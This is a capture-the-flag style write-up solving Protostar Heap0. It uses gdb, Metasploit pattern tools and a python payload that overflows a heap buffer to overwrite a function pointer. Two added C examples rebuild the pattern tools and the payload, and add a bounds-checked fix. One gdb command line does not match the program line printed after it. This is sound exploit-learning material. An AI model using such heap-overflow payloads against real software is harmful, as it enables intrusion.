I haven’t written about any binary exploitation in a while, so I decided to do a write-up for Protostar Heap0 on Exploit Exercises.
I picked Heap0 in particular because I know that my heap skills are definitely lacking when compared to the stack. That, combined with LiveOverflow’s Use-after-free tutorial for Heap2 pushed me towards working through these.
To start, I downloaded the code from the challenge’s page. I decided to perform everything locally, as I didn’t want to worry about having to download and set up a VM for the time being.
Once I had the code on my machine, I compiled it and took a glance at its basic usage.
root@kali:~/Documents/exploit-exercises/protostar# gcc -o heap0 -fno-stack-protector -m32 heap0.c
heap0.c: In function 'main':
heap0.c:32:9: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types]
 f->fp = nowinner;
 ^
root@kali:~/Documents/exploit-exercises/protostar# ./heap0
data is at 0xe4e010, fp is at 0xe4e060
Segmentation fault
root@kali:~/Documents/exploit-exercises/protostar# ./heap0 'A'
data is at 0x9a2010, fp is at 0x9a2060
level has not been passed
With no argument the program segfaults, because argv[1] is NULL and goes straight into strcpy; with an argument it prints the addresses of its two heap allocations and "level has not been passed". One thing to watch in this first run: the two allocations are 0x50 bytes apart, which is the spacing a 64-bit build prints (16-byte chunk header). Every run of the -m32 binary below prints them 0x48 apart, and that spacing is what the exploit ends up depending on.
Since name is only a 64 byte buffer, I wanted to see whether a 100 character string would overflow it.
root@kali:~/Documents/exploit-exercises/protostar# gdb heap0
GNU gdb (Debian 7.11.1-2) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from heap0...(no debugging symbols found)...done.
(gdb) r `python -c 'print "A" * 100'`
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A" * 100'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
As expected, strcpy ran past the end of name into the next chunk and overwrote f->fp, so when the program called f->fp() it jumped to 0x41414141. Next I created a pattern to find the exact offset of the function pointer.
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
< ... snip ... >
(gdb) r 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
Starting program: /root/Documents/exploit-exercises/protostar/heap0 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
data is at 0x804b008, fp is at 0x804b050
Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()
I then fed the value that landed in EIP, 0x41346341, to pattern_offset and got an offset of 72. That matches the two addresses the program prints: 0x804b050 - 0x804b008 = 0x48 = 72, the 64-byte name buffer plus the 8-byte chunk header of the allocation that follows it.
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -q 0x41346341 -l 100
[*] Exact match at offset 72
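To show what the two Metasploit scripts are doing under the hood, here is an added example (my own code, not from the post and not Metasploit's Ruby) that re-implements them in C: pattern_create emits the same "Aa0Aa1...Zz9" sequence, and pattern_offset looks for the little-endian bytes of the value that landed in EIP. The function names are mine; the 100-byte pattern and the 0x41346341 value are the ones from the gdb session above.

```c
/* Added example: a C re-implementation of pattern_create.rb / pattern_offset.rb.
 * Not code from the post or from Metasploit; function names are my own. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Fill `out` with `len` bytes of the cyclic pattern and a trailing NUL
 * (`out` must hold len + 1 bytes). For every upper-case letter, every
 * lower-case letter and every digit, emit the three characters; the
 * sequence only repeats after 26 * 26 * 10 * 3 = 20280 bytes, so every
 * 4-byte window inside that is unique. */
void pattern_create(char *out, size_t len)
{
    size_t n = 0;
    while (n < len) {
        for (char u = 'A'; u <= 'Z' && n < len; u++)
            for (char l = 'a'; l <= 'z' && n < len; l++)
                for (char d = '0'; d <= '9' && n < len; d++) {
                    char trip[3] = { u, l, d };
                    for (int i = 0; i < 3 && n < len; i++)
                        out[n++] = trip[i];
                }
    }
    out[n] = '\0';
}

/* Locate the 32-bit value that ended up in EIP inside the pattern.
 * The register holds the bytes little-endian, so 0x41346341 is the
 * substring "Ac4A". Returns the byte offset, or -1 if it is not present
 * (for example when EIP was not overwritten by the pattern at all). */
long pattern_offset(const char *pattern, size_t len, uint32_t value)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(value >> (8 * i));
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    char pat[101];
    pattern_create(pat, 100);
    printf("%s\n", pat);
    printf("offset of 0x41346341: %ld\n", pattern_offset(pat, 100, 0x41346341));
    return 0;
}
```

Running it prints the same 100-character pattern as pattern_create.rb and reports 72 for 0x41346341. The -1 case matters in practice: if the faulting EIP is not found in the pattern, the crash came from somewhere other than a clean overwrite, and the offset search has nothing to say about it.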
With the offset of 72 confirmed, I overwrote EIP with my "BBBB" string:
(gdb) r `python -c 'print "A"*72 + "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A"*72 + "BBBB" + "C"*24'`
data is at 0x804b008, fp is at 0x804b050

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
The only thing left was the address of the winner function, which is a single print command in gdb. The binary is not position-independent (the 0x0804xxxx text address is fixed), so this address is the same outside the debugger.
(gdb) print winner
$1 = {<text variable, no debug info>} 0x804849b <winner>
With everything in place, I wrote the full exploit and passed the level. The address goes in little-endian byte order, so 0x804849b becomes "\x9b\x84\x04\x08". The heap addresses in this run differ from the gdb ones because of ASLR, but the exploit never needs them: it only relies on the fixed 72-byte distance between the two chunks and the static address of winner.
root@kali:~/Documents/exploit-exercises/protostar# ./heap0 `python -c 'print "A"*72 + "\x9b\x84\x04\x08"'`
data is at 0x8d59008, fp is at 0x8d59050
level passed
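As an added example (my own code, not from the post or the Protostar sources), the pieces of the exploit above written out in C: the offset is just the distance between the two pointers the program prints, the payload is that many filler bytes followed by the target address in little-endian order, and the fix is a copy that refuses input that does not fit in the 64-byte name buffer. The struct shape mirrors heap0.c's name[64]; the function names and the checked-copy routine are my own, and the addresses are the ones from the gdb run above.

```c
/* Added example: offset computation, payload construction and the bounded
 * copy that closes the hole. Not the post's code or Protostar's. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 64

/* Same shape as the first allocation in heap0.c: a bare 64-byte name. */
struct data { char name[NAME_LEN]; };

/* Filler bytes needed before the address: the distance from the start of
 * name to the function pointer in the next chunk. For the 32-bit build in
 * the post, 0x804b050 - 0x804b008 == 72 (64 bytes of name plus the 8-byte
 * malloc chunk header). On a 64-bit build the header is 16 bytes and the
 * pointer 8, so both this value and the address width change. */
size_t overflow_offset(uintptr_t data_addr, uintptr_t fp_addr)
{
    return (size_t)(fp_addr - data_addr);
}

/* Build the exploit string: `offset` bytes of 'A', then `target` as four
 * little-endian bytes, which is what the python -c one-liner emits.
 * Returns the payload length, or 0 if it would not fit in `out`. */
size_t build_payload(unsigned char *out, size_t out_len,
                     size_t offset, uint32_t target)
{
    size_t total = offset + sizeof target;
    if (total > out_len)
        return 0;
    memset(out, 'A', offset);
    for (size_t i = 0; i < sizeof target; i++)   /* 0x0804849b -> 9b 84 04 08 */
        out[offset + i] = (unsigned char)(target >> (8 * i));
    return total;
}

/* The vulnerable pattern: strcpy() copies as many bytes as the source has,
 * so anything longer than 63 characters runs into the neighbouring chunk.
 * Kept only for contrast; never call it with untrusted input. */
void copy_name_vulnerable(struct data *d, const char *src)
{
    strcpy(d->name, src);
}

/* The fix: find the terminator within the buffer size first and reject the
 * input if it is not there. Returns 0 on success, -1 if src is too long. */
int copy_name_checked(struct data *d, const char *src)
{
    const char *nul = memchr(src, '\0', NAME_LEN);
    if (nul == NULL)
        return -1;                      /* would not fit, including the NUL */
    memcpy(d->name, src, (size_t)(nul - src) + 1);
    return 0;
}

int main(void)
{
    size_t off = overflow_offset(0x804b008, 0x804b050);   /* from the gdb run */
    unsigned char payload[128];
    size_t len = build_payload(payload, sizeof payload, off, 0x0804849b);

    printf("offset %zu, payload %zu bytes, last four:", off, len);
    for (size_t i = off; i < len; i++)
        printf(" %02x", payload[i]);
    putchar('\n');

    struct data d;
    char longname[100];
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';
    printf("checked copy of a 99-byte name: %d\n", copy_name_checked(&d, longname));
    printf("checked copy of \"A\": %d\n", copy_name_checked(&d, "A"));
    return 0;
}
```

The point of computing the offset from the two printed addresses rather than hard-coding 72 is that it is the only thing the exploit actually depends on; the heap base moves between runs under ASLR, the distance between the chunks does not, and winner's address is static because the binary is not PIE.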
While Protostar Heap0 was a simpler exercise, I’m hoping to continue working through the rest of the heap challenges.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.